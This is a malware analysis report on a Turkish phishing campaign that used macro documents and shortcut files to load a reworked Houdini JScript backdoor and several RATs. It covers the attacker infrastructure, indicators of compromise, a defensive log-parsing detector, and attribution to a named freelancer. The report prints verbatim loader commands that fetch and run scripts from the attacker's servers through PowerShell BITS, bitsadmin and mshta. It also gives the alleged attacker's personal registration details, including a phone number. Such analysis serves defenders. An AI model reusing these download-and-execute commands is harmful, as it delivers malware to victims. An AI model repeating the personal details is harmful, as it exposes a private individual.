December 17, 2019

Turkish tricks with worms, RATs… and a freelancer


The Positive Technologies Expert Security Center has detected a malicious campaign active since at least mid-January 2018. The operation most focused on users from Brazil, Germany, Hungary, Latvia, the Philippines, Turkey, United Kingdom, and the USA. The long operation included use of a number of tools and techniques for infecting and controlling victim PCs. Here we will detail the stages of infection, utilities and network infrastructure used, and the digital traces that put us on the spot as the alleged hacker.

Executive summary

  • Attackers reworked and modernized a 10-year-old worm 
  • Unusual set of tools and extensive network infrastructure
  • The main suspect is a Turkish freelancer

Payload delivery

Office documents

On April 5, 2019, as part of tracking new threats, specialists at the PT Expert Security Center investigated a suspicious Microsoft Office document. The file had the .docm extension (modern Microsoft Word format with support for macros). We also know that it:
  • Was created several days prior to detection (2019-03-31)
  • Contained an image asking the user to enable macros
  • Was created on a Turkish-language system (as indicated by values of metadata fields: "Konu Başlığı" / "Subject Heading" and "Konu Başlığı, 1" / "Thread Title, 1"—as translated by Google Translate)
Figure 1. Typical message for tricking victims into enabling macros
The macro code is slightly obfuscated but compact. It uses a Background Intelligent Transfer Management (BITS) PowerShell cmdlet to download and run a JScript script from the attacker's server:
Shell ("pow" & "ershe" & "ll -comm" & "and ""$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb1.js;');Start-Process -WindowStyle hidden -FilePath 'cmd.exe' -ArgumentList '/c %systemroot%\system32\wscript %temp%\bb1.js'""")
The reason for use of PowerShell as well as the unusual module for downloading files from the web server is to evade restrictions on opening and running untrusted programs.

There are some similar documents. One of them is a .doc file (old Microsoft Word format) with Turkish character code page. The macro works in a very similar way:

Shell "cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%\o2.js & wscript.exe %temp%\o2.js", vbHide

Here the malware author is using the same BITS technique, but now with the help of the legitimate system utility bitsadmin. Note that both the document's creation date and the time of its detection on public sources point to the middle of July 2018. So the attacks have been in progress for around a year, at a minimum. The payload is downloaded from the same attacker server, and the approach to naming the JScript script is similar too.

A different document has the extension .rtf (Rich Text Format). The file has several embedded .xls (old Microsoft Excel format) documents with identical contents. The macro code is completely identical to that from the first document. This, as well as the identical values of the code page and HeadingPairs XML field, suggests a common author.

LNK shortcuts

Not only Office documents were used for initial infection. We found a few malicious .lnk (Windows Shell Link) files that, when run, triggered execution of the following command:

C:\Windows\System32\cmd.exe /c powershell -command "$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb.js;')" & %systemroot%\system32\wscript %temp%\bb.js

The shortcuts were distributed during mid-March and late April 2019.

Their metadata contains the username win7-bilgisayar (in translation from Turkish: "win7-computer"), indicating the user of the system on which the shortcuts were created.

We can state with confidence that phishing emails were the most likely method used for delivering malicious files for initial infection.

The metamorphoses of Houdini

Minor differences aside, all the objects for the initial infection stage download and run the same JScript script. The file is not obfuscated or packed. The only step taken to confound analysis was use of random variable names. The script is a WSH backdoor with the following properties:

  • The C2 address and port are hard-coded.
  • C2 is performed via HTTP POST requests.
  • When the script starts, the string "is-bekle" (in translation from Turkish: "is-ready") is inserted in the URI field.
  • The User-Agent field contains brief information about the system, separated by a script-defined delimiter (in this case, "<|>"):
    • Hard disk serial number
    • Username
    • System version
    • Script name
    • Antivirus software name
    • Value of the %ProgramData% environment variable
    • Whether .NET Framework 4.5.2 is installed
    • Wait time between requests
    • Whether Java is installed
  • It checks whether it is running in a Kaspersky Lab sandbox based on the hard disk serial number. If the number is a match, the script stops running.
  • It gets and runs server commands, which include:
    • Downloading a file from the server
    • Uploading a file to the server
    • Stealing the clipboard contents
    • Stealing contents of a folder
    • Getting information on current processes
    • Running commands (cmd.exe)
    • Taking and sending screenshots
    • Extracting and sending stored Chrome and Opera passwords
Figure 2. Beginning of the JScript script downloaded from the attacker server
Based on the comments, code structure, command names, and format for gathering system information, we find parallels with the well-known Houdini VBS worm. In 2013, researchers at FireEye picked apart the functions of Houdini, which handles commands and collects information in a similar way. It would seem that in our case, the attacker borrowed from the well-known worm, rewrote its functions in JScript instead of VBScript, and replaced some English strings with Turkish ones for his convenience.

Figure 3. Handling of JScript backdoor commands
The strings passing the results of command execution contain "Bcorp" in their name. This same combination of letters is present in the name of the C2 server: ip1[.]bcorp.fun.
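The check-in format described above (an HTTP POST whose URI carries "is-bekle" and whose User-Agent is a "<|>"-delimited list of host details) is a stable network signature for this backdoor. The following is an added example for this article, not code from Positive Technologies or from the campaign: it parses constructed proxy log lines, flags requests that match the check-in shape or a C2 host named in this article, and turns the User-Agent into a structured record for triage. The simplified log layout, the field names, and the victim addresses (10.0.0.x, 203.0.113.7, example.com hosts) are all assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlsplit

DELIM = "<|>"
# Field order of the backdoor's User-Agent header, as listed above (names are ours).
UA_FIELDS = [
    "disk_serial", "username", "os_version", "script_name", "antivirus",
    "program_data", "dotnet_452_installed", "sleep_interval", "java_installed",
]
CHECKIN_MARKER = "is-bekle"
# C2 hosts named in the article.
KNOWN_C2_HOSTS = {"ip1.bcorp.fun", "ip1.qqww.eu", "husan2.ddns.net"}

# Constructed proxy log lines (not real traffic) in a simplified
# 'client method url status "user-agent"' layout. Lines 1, 3 and 4 imitate the
# backdoor's check-in; lines 2 and 5 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.15 POST http://ip1.bcorp.fun:86/is-bekle 200 "SERIAL123<|>alice<|>Microsoft Windows 7 Professional<|>bb1.js<|>Windows Defender<|>C:\\ProgramData<|>true<|>5<|>false"
10.0.0.22 GET http://www.example.com/index.html 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.15 POST http://ip1.bcorp.fun:86/is-bekle 200 "SERIAL123<|>alice<|>Microsoft Windows 7 Professional<|>bb1.js<|>Windows Defender<|>C:\\ProgramData<|>true<|>5<|>false"
10.0.0.31 POST http://203.0.113.7:87/is-bekle 200 "XYZ987<|>bob<|>Microsoft Windows 10 Pro<|>o2.js<|>ESET<|>C:\\ProgramData<|>false<|>10<|>true"
10.0.0.40 POST http://intranet.example.internal/api/upload 200 "CustomAgent/1.0"
"""

LOG_RE = re.compile(r'^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+) "(?P<ua>.*)"$')


@dataclass
class Beacon:
    client: str
    host: str
    port: Optional[int]
    fields: Dict[str, str]
    reasons: List[str]


def parse_houdini_ua(ua: str) -> Optional[Dict[str, str]]:
    """Split a '<|>'-delimited User-Agent into the fields the backdoor reports.
    Returns None for ordinary User-Agent strings."""
    if DELIM not in ua:
        return None
    parts = ua.split(DELIM)
    if len(parts) < len(UA_FIELDS):
        return None
    return dict(zip(UA_FIELDS, parts))


def analyse(log_text: str) -> List[Beacon]:
    """Return one Beacon per log line that looks like a backdoor check-in."""
    beacons = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        reasons = []
        fields = parse_houdini_ua(m["ua"])
        if fields is not None:
            reasons.append("houdini_ua_format")
        if m["method"] == "POST" and CHECKIN_MARKER in url.path:
            reasons.append("is-bekle_checkin")
        if url.hostname in KNOWN_C2_HOSTS:
            reasons.append("known_c2_host")
        if reasons:
            beacons.append(Beacon(m["client"], url.hostname or "", url.port, fields or {}, reasons))
    return beacons


def infected_hosts(beacons: List[Beacon]):
    """Summarise unique victims as (client IP, username, script name) for triage."""
    return sorted({(b.client, b.fields.get("username", "?"), b.fields.get("script_name", "?"))
                   for b in beacons})


if __name__ == "__main__":
    found = analyse(SAMPLE_LOG)
    for b in found:
        print(b.client, "->", b.host, b.port, b.reasons)
    print(infected_hosts(found))
```

The structural checks (delimiter count, "is-bekle" path) keep working when the operator rotates to a new domain or port, which this campaign did several times; the known-host list is only an extra confirmation.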

Attacker's server

According to Shodan as of April 30, 2019, the attacker's host was running an AppServ web server. The server was not locked down very well: for example, the phpinfo page (which displays configuration information of interest) was accessible. Analysis of the URLs used to download malware showed that the server has a public directory (./a) listing the attacker's other tools.

Figure 4. Home page of the attacker's server
Figure 5. phpinfo page on the attacker's server
Figure 6. Contents of publicly available directory on the attacker's server as of late April 2019

Figure 7. Contents of publicly available directory on the attacker's server as of late May 2019
Here are descriptions of some of the files we found.

Houdini JScript

Most of all, we found a large number of variations on the modified Houdini worm we just looked at. Changes in the script from version to version were small: changes in host names (husan2.ddns.net, ip1.bcorp.fun, ip1.qqww.eu), ports (86, 87), and variable names. Particular commands appeared or disappeared. One version was even embedded in a JScript scriptlet.

Figure 8. Houdini JScript in scriptlet form

Bcorp JAR

This independently created lightweight backdoor, written in Java, uses TCP port 22122 for C2. Capabilities include:

  • Running commands in cmd.exe
  • Determining the OS version
  • Listing directories
  • Uploading files
  • Adding itself to the startup items folder and autostart registry key

This appears to be why the modified worm checks for the presence of Java on the system. But it is not clear why an additional backdoor would be needed if the first one has a wide range of functions.

Get-ChromeCreds

This PowerShell wrapper extracts browsing history, usernames, passwords, and cookies from Google Chrome. Some versions contain the library System.Data.SQLite.dll for x86 and x64 systems in base64 encoding; the other versions assume that the library will be present in the %APPDATA% folder. Provided as a plugin component for the main JScript backdoor.

Start-KeyLogger

This PowerShell implementation of a simple keylogger is also provided as a plugin component for the main JScript backdoor.

Figure 9. Code fragment from the PowerShell keylogger

WebBrowserPassView

This utility from Nirsoft grabs usernames and passwords from popular browsers. The attackers used a specially tweaked version, having packed it with ASPack to complicate analysis or bypass signature detection.

NetWire RAT

This publicly available commercial remote administration tool is used by a number of cybercrime groups. In this case, obfuscation was accomplished by packing the RAT in a .NET PE file and applying DeepSea 4.1.

TCP Listen

This bare-bones GUI utility from AllScoop is used to test router and firewall settings. For each listener port it displays a string and ends the connection.

Figure 10. TCP Listen GUI

LNK loader

This tool is similar to the ones described already. When run, it performs the following command:
C:\Windows\System32\cmd.exe /v /c "set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm"
In this case the shortcut was created under another user (desktop-amkd3n3).

Script loaders

We have put all the loaders for the already-mentioned RATs in this group. They are all small (less than 1 KB each) and in various formats (such as .htm, .xsl, and .hta). They are written in various languages, both of the scripting variety (JScript, PowerShell) and compiled-on-the-fly (C#). Here are code fragments from a few samples:

Figure 11. Fragment of the .htm loader
Figure 12. Fragment of the .xsl loader
Figure 13. Fragment of the .ps1 loader

Tiny PE loaders

Besides script loaders, we also found .NET PE files. These files, too, were small (up to 10 KB) but with similarly extensive functionality:

Figure 14. Sample of decompiled code from one of the PE loaders

xRAT

An open-source remote administration tool. Many versions and modifications are available publicly. Written in C# with partial obfuscation.

Bcorp panel and builder

Server-side component of the JScript backdoor. It also serves as the builder for the client side. A .NET PE, the component is not obfuscated or packed. The interface resembles that of a tweaked Houdini server. It can send commands plus additional components and plugins to an infected machine: Java environment, PowerShell scripts and Nirsoft utility to grab browser data, PowerShell keylogger scripts, and others. Note that the project is named BcorpRat, as can be seen in the title bar of the window in the following screenshot. The namespace of the source code contains "Btech" in its name—remember this detail for later.

Figure 15. JScript backdoor admin panel: main window
Figure 16. JScript backdoor admin panel: client-side builder window

Network infrastructure

Now we will take a closer look at the addresses used for interaction with the attacker's malware. We will start with the domain definebilimi.com, with which the Office documents and LNK loaders communicate.

definebilimi.com

The domain changed owners on January 16, 2018. (Incidentally, "define bilimi" means "treasure of science" in Turkish.) Below are some of the most interesting WHOIS tidbits from that time.

Field                  Value
Registrant Name        Koray YAMAN
Registrant Street      123456
Registrant City        Istanbul
Registrant Country     TR
Registrant Phone       +90.5350167352
Registrant Email       btech@hotmail.com.tr

It would be hasty to take this information at face value, of course. Still, the indicated country and the frequent traces of Turkish in the code suggest that these coincidences are not accidental. And the email address contains "btech," which is a bit of a recurring theme.

The history of NS servers for the domain is interesting:

Date          Action          Server
17.03.2018    New record      buhar.biz
15.01.2019    Record changed  definebilimi.com
04.06.2019    Record changed  qqww.eu

The hosts buhar.biz and qqww.eu have already been encountered in malware.

buhar.us

The history of this domain ("buhar" means "steam" in Turkish) starts on January 16, 2018, the same day as definebilimi.com.

Field                    Value
Registrant Name          balta zar
Registrant Organization  BuharuS
Registrant Street        Gizli
Registrant City          Gizli
Registrant Country       TR
Registrant Phone         +1.123456789
Registrant Email         buharcin@yandex.com

The situation is similar: most of the data looks fake, other than the email address ("buharcin" is Turkish for "steamer").

bcorp.fun

Registered on March 23, 2019. The registration country is (yet again) Turkey and the client organization is "Bcorp." Not to mention that we see "bcorp" in the name of the domain itself—a string that should look familiar by now.

husan2.ddns.net

The attacker used at least one unconventional way to handle hosting. Starting in mid-March 2019, we were able to record use of dynamic DNS servers. Such servers enable attackers to hide their IP addresses and keep their C2 alive for longer. The choice of names was somewhat predictable: a few months later we detected use of husan3.ddns.net, while husan.ddns.net was active as far back as April 2017.

bkorp.xyz

Starting in early April, the hacker registered domains with anonymization from WhoisGuard, Inc., which is located in Panama. Some examples include bkorp.xyz, prntsrcn.com, and i37-imgur.com. The NS servers used link these domains to the other malicious ones.

qqww.eu

This domain—like bcorp.fun—has the subdomain ip1. The registrant (Osbil Technology Ltd.) is supposedly located in Berlin. In reality, a company with the same name is located on the east coast of Cyprus in the city of Famagusta, in the partially recognized Turkish Republic of Northern Cyprus. The company's official site is hosted on a domain that acted as NS server for bcorp.fun from March to May 2019. We did not find any signs of compromise of the name servers. Because of the NS provider's configuration (with the provider's information replacing the client's in the registrant field) client information was hidden from public view.

Figure 17. Information about the registrant (owner) of qqww.eu

IP addresses

For a fuller picture, we will give IP addresses with some of the domains corresponding to them at various points in time:
  • 5.255.63.12
    • bcorp.fun
    • husan.ddns.net
    • husan2.ddns.net
    • husan3.ddns.net
    • qqww.eu
  • 192.95.3.137
    • bcorp.fun
    • bkorp.xyz
    • definebilimi.com
    • i36-imgur.com
    • i37-imgur.com
    • i38-imgur.com
    • i39-imgur.com
    • prntsrcn.com
    • qqww.eu
  • 192.95.3.140
    • bkorp.xyz
    • buhar.us

On the trail of the hacker

Among the malicious tools and utilities found on the attacker's server, we uncovered a curious image:

Figure 18. Image file found on the attacker's web server

We have not reduced the image size. The image is included here with the exact same dimensions as on the server.

Despite the poor image quality, we were able to establish that this is a screenshot of a transaction page on blockr.io. This was a dead end, but we started to look for any associations with the name of the image file (IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg). We uncovered an online scan result for a file that had the same name as the image. The analyzed object was a Windows shortcut similar to the ones discussed previously. Attached was an image containing the photo ID card of a Turkish citizen. The last name on the card (Yaman) matches one found repeatedly in the domain registration records.

Figure 19. ID card found with LNK loader
Scanning of the shortcut in the online sandbox was triggered not by a user uploading a file, but by accessing the following target URL:

hxxps://github.com/btechim/prntsrcn/blob/nm46ny/IMG-0371e4dce3c8804f1543c3f0f309cc11.jpg.lnk?raw=true
The user's Github account is now blocked, but based on the URL we can deduce the user's handle (btechim) and the name of the project (prntsrcn). The project name matches the name of one of the domains used in the campaign (prntsrcn.com). The user handle contains "btech," which we saw in the software for the admin panels described already.

Searching for this same handle put us onto a freelancer hiring site. There we find a page for a freelancer in Turkey who has the same handle, along with confirmed phone number, mailing address, and Facebook profile. He is offering his services in the area of software development and cybersecurity.

Figure 20. The suspected attacker's page on a freelancer hiring site

Conclusions

Positive Technologies tracked this malicious campaign of Turkish origin for several months. It is rare to see a single series of attacks combining both modern techniques and modified 10-year-old tools. The attacker employed a wide range of tools of diverse purpose, platform, and sophistication to obtain total control over victim PCs. He used a wide range of techniques to hide his identity when establishing network infrastructure. But it was not possible to account for everything—and so pride and a few slipups ultimately gave away the game. The research was sent to the Turkish Information Security Incident Response Center.

Author: Alexey Vishnyakov, Positive Technologies

IOCs

Office loaders

3305720da73efbcb7d25edbb7eff5a1a
5b6d77f3e48e7723498ede5d5ba54f26
621a0133e28edec77a2d3e75115b8655
712e7ec49ad3b8c91b326b6d5ee8dcd8
731a3d72e3d36c2270c1d0711c73c301
929374b35a73c59fe97b336d0c414389

LNK loaders

3bc5d95e2bd2d52a300da9f3036f5b3b
527069e966b4a854df35aef63f45986a
a4667e0b3bfaca0cda5c344f1475b8e0

Houdini JScript

04c2ad67de2cea3f247cf50c5e12e969
5ab9176b9ed9f7a776ec82c412a89eab
84f0d098880747f417703f251a2e0d1c
94c6ba0d812b4daf214263fffc951a20
a52509a38846b55a524019f2f1a06ade
bf2fb6cdbc9fde99e186f01ad26f959f
c871091ce44594adbd6cf4388381e410
daf6a9eb55813d1a151695d33506179d
f010af1b330d00abb5149e9defdae6ee
ff924faeb9dfd7384c05abe855566fc9

Bcorp JAR

59978b5a9e4ab36da0f31a8f616cc9d3
a7219da3b0c0730c476fe340dbf7e4e5
ddac55213089da9ef407bce05ebe653e

Get-ChromeCreds

11769e9f49123a2af00bd74453221c07
1a81c9119d7761535c198ddb761979b8
42a85849a591e65b0254d9bcbdf59f82
8e49263f33c53ee5bc91bebbf9617352
c9ab090ad2badb9862fd5b6058428096

Start-KeyLogger

55daa84475a11ea656183e0ad5ccc608
aa82fbb6a341d71d2431b6d2ebca027c

WebBrowserPassView

7722e086cf7ed59955a1d6ec26f49cf3

NetWire RAT

1470a08bd427bb8738a254ba4f130ff5
5f8495016773c7834b1c588f0997a6c4

TCP Listen

913567da98185cad9f91a570dc298de1

Script loaders

02946d10c6a34fe74826f3c0b0a6a3e0
1ad644bdba488a6e42ad76aea2c0ee54
3a2dcf36b9206a135daa73c645a3f56f
4dddd87d3cb80145c9859fd76dfef794
74c5e5be9f79bd9e7ee84fd046c14e68
78f4d5fa6c68dae4b03860b54ec6cc67

Tiny PE loaders

0f3c56018a7051aebe060454fc981f5b
1b9cefc229daddc4557cea0e3bdf4656
29e6679107bd9c72aa061371082206bb
b66b7395825b9ed656b768d4e7fe1de7
fbc606b8b04e51ddb342e29b84ac1edb

xRAT

2e9a0637478938cc3e4519aa7b4219cc
7c67c93ba243be32e5fd6a6921ceded3

Bcorp panel and builder

405c987ba1a8568e2808da2b06bc9047
c3ac8b7a7c8c0d100e3c2af8ccd11441

Bcorp C2

bcorp.fun
bkorp.xyz
buhar.us
definebilimi.com
husan.ddns.net
husan2.ddns.net
husan3.ddns.net
i36-imgur.com
i37-imgur.com
i38-imgur.com
i39-imgur.com
prntsrcn.com
qqww.eu
5.255.63.12
192.95.3.137
192.95.3.140
